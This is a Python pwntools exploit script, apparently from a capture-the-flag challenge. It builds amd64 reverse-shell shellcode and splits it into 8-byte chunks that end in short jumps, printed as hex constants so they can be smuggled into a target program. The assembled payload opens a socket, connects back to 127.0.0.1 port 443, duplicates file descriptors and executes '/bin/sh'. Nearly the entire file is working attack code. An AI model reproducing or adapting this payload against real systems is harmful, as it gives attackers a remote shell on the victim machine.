from pwn import *
context(arch='amd64')
# Two-byte short jmp with displacement 0xc.  Nothing below reads this
# module-level value (make_double builds its own jmp bytes locally).
jmp = b'\xeb\x0c'

# State of the filler-byte sequence; both are mutated only by junk_byte().
current_byte = 0x90  # last filler byte handed out (seed value before the first call)
read_bytes = 0       # number of junk_byte() calls so far
def junk_byte():
    """Return the next filler byte and advance the module-level sequence state.

    The sequence is a running counter: each call adds the number of bytes
    handed out so far plus 0x17 to ``current_byte``, wraps the result to one
    byte, bumps ``read_bytes`` and returns the new byte as a 1-byte ``bytes``.
    Both counters live in the module globals, so the sequence only restarts
    if a caller resets ``current_byte`` and ``read_bytes`` themselves.
    """
    global current_byte, read_bytes
    step = read_bytes + 0x17
    current_byte = (current_byte + step) & 0xFF
    read_bytes += 1
    # Value is already masked to 0..255, so a single-byte bytes() is exact.
    return bytes([current_byte])
# Count of chunks printed so far; read and incremented by make_double().
made = 0
def make_double(code):
    """Print one 8-byte chunk, as a hex literal, that ends in a short jmp.

    ``code`` is a machine-code snippet of at most 6 bytes (asserted).  It is
    followed by a 2-byte ``eb XX`` short jump whose displacement is 0xc plus
    however many bytes the snippet fell short of 6 (so the jump target sits
    at the same offset from the chunk start whatever the snippet length),
    plus a further 3 once more than 14 chunks have been made.  The result is
    padded to 8 bytes with one byte from ``junk_byte()``, unpacked with
    pwntools ``u64`` (endianness follows the ``context`` set at file top) and
    printed as ``0x`` + 16 upper-case hex digits + ``n,``.

    Side effects: increments the module-level ``made`` counter and advances
    the ``junk_byte`` state by exactly one call, whether or not padding is
    actually needed.
    """
    global made
    assert len(code) <= 6
    displacement = 0xc + (6 - len(code))
    if made > 14:
        # Layout adjustment for the consuming program; the reason for the
        # threshold is not visible in this file.
        displacement += 3
    made += 1
    tail = b'\xeb' + bytes([displacement])
    # junk_byte() is called once per chunk even when the chunk is already
    # 8 bytes long, which keeps the filler sequence in step with the count.
    chunk = (code + tail).ljust(8, junk_byte())
    print(f"0x{u64(chunk):016X}n,")
## socket(2,1,6)
# Each make_double() call below prints one 8-byte chunk.  Order and count
# both matter: make_double() changes its jmp displacement once more than 14
# chunks have been made, and junk_byte() state advances once per chunk.
make_double(asm('xor rax,rax'))
make_double(asm('xor rdi,rdi'))
make_double(asm('xor rsi,rsi'))
make_double(asm('xor rdx,rdx'))
make_double(asm('xor r8,r8'))
make_double(asm('push 0x2'))
make_double(asm('pop rdi'))
make_double(asm('push 0x1'))
make_double(asm('pop rsi'))
make_double(asm('push 0x6'))
make_double(asm('pop rdx; push 0x29'))
make_double(asm(' mov rcx,r12'))
make_double(asm('pop rax; syscall'))
## connect syscall
make_double(asm('mov r8,rax'))
make_double(asm('xor rsi,rsi'))
make_double(asm('xor r10,r10'))
make_double(asm('push r10'))
make_double(asm("mov BYTE PTR [rsp],0x2"))
## port crafting
make_double(asm("mov BYTE PTR [rsp+0x1],0x0"))
make_double(asm("mov BYTE PTR [rsp+0x2], 0x01"))
make_double(asm("mov BYTE PTR [rsp+0x3], 0xbb"))
## IP crafting
make_double(asm("mov BYTE PTR [rsp+0x4], 0x7f"))
make_double(asm("mov BYTE PTR [rsp+0x5], 0x00"))
make_double(asm("mov BYTE PTR [rsp+0x6], 0x00"))
make_double(asm("mov BYTE PTR [rsp+0x7], 0x01"))
## remaining connect
make_double(asm('mov rsi,rsp'))
make_double(asm('push 0x10'))
make_double(asm('pop rdx'))
make_double(asm('push r8'))
make_double(asm('pop rdi'))
make_double(asm('push 0x2a'))
make_double(asm('pop rax'))
make_double(asm('syscall'))
## dup2 syscall & jmp handling
make_double(asm('xor rsi,rsi'))
make_double(asm('push 0x3'))
make_double(asm('pop rsi'))
make_double(asm('dec rsi'))
make_double(asm('push 0x21'))
make_double(asm('pop rax'))
make_double(asm('syscall'))
# print("0x9090909090909f75n") # for jmping (earlier attempt, kept for reference)
# Hand-written chunk, not produced by make_double(): it does not advance the
# `made` counter or the junk_byte() state.
print("0x0feb90909090a275n,") # for jmping (correct)
## execve syscall
make_double(asm('xor rdi,rdi'))
make_double(asm('push rdi'))
make_double(asm('push rdi'))
make_double(asm('pop rsi'))
make_double(asm('pop rdx'))
# execve single byte chain: the path string is written one byte at a time
make_double(asm("push 0x1337"))
make_double(asm("pop rdi; push rdi"))
make_double(asm("mov rdi, rsp;"))
make_double(asm("mov BYTE PTR [rdi], 0x2f"))
make_double(asm("mov BYTE PTR [rdi+0x1], 0x62"))
make_double(asm("mov BYTE PTR [rdi+0x2], 0x69"))
make_double(asm("mov BYTE PTR [rdi+0x3], 0x6e"))
make_double(asm("mov BYTE PTR [rdi+0x4], 0x2f"))
make_double(asm("mov BYTE PTR [rdi+0x5], 0x73"))
make_double(asm("mov BYTE PTR [rdi+0x6], 0x68"))
make_double(asm("mov BYTE PTR [rdi+0x7], 0x00"))
make_double(asm('push 0x3b'))
make_double(asm('pop rax'))
make_double(asm('syscall'))